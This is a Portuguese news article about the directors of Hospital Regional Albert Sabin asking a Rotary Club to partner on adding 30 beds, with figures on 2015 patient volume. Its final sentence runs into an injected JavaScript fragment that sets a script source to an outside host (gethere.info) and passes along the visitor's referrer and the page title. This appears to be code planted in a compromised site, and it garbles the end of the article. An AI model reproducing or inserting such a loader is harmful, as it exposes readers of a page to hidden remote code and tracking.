Os diretores do Hospital Regional Albert Sabin participaram na noite de segunda-feira, 11, de uma reunião do Rotary Club para mostrar a situação do hospital e requerer parceria no projeto de ampliação da estrutura da unidade hospitalar.
O diretor técnico e médico ginecologista, Sérgio Dezanetti e o diretor administrativo, José Marcos da Silva, disseram que a intenção da direção do hospital em fazer um primeiro contato com a entidade, foi de verificar a possibilidade do Rotary de enfrentarem esse desafio juntos.
O diretor administrativo demostrou aos rotarianos as estatísticas de atendimento hospitalar da unidade. Somente em 2015 o HRAS realizou em torno de 30 mil atendimentos entre ambulatórias, internações e cirurgias, esse número representa 30% da população dos seis municípios que compõem a região do Alto Tapajós.
A necessidade de ampliação do espaço físico é fundamental para o atendimento de toda essa população. O hospital hoje atende acima do que é recomendado pelo Ministério da Saúde para segurança dos próprios pacientes. Em 2015 foram mais de 2 mil cirurgias de ortopedia, obstetrícia e ginecologia, buco maxilo e geral, realizada na unidade hospital.
Segundo José Marcos os número para 2016 devem superar os de 2015, a quantidade de atendimento realizado nos três primeiros meses desse ano já superaram os do mesmo período. Hoje o hospital possui 74 leitos e o projeto prevê a construção de mais 30 leitos de enfermaria. O valor do investimento necessário não foi revelado.
José Marcos esclareceu que hoje o hospital está com a estrutura comprometida em relação ao que necessita para o serviço e que o hospital gasta mais para produzir menos, por isso precisa de investimento para funcionar da forma que necessita.
“Um hospital abaixo de 120 leitos não alcança o equilíbrio econômico financeiro, ele sempre vai gastar mais do que ele poderia, para produzir o mesmo serviço, portanto, nós já sabemos que temos um gasto mensal acima daquilo que ele pode produzir”.
O presidente do Rotary Juliano dos Santos Cezar disse que essa reunião foi uma conversa inicial mas que a entidade tem interesse em participar do projeto. “Trata-se de uma grande oportunidade de estarmos mais uma vez colaborando com a comunidade e exercendo o nosso papel enquanto Rotarianos, cujo lema é o “dar de sí, antes de pensar em sí”, disse o presidente.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;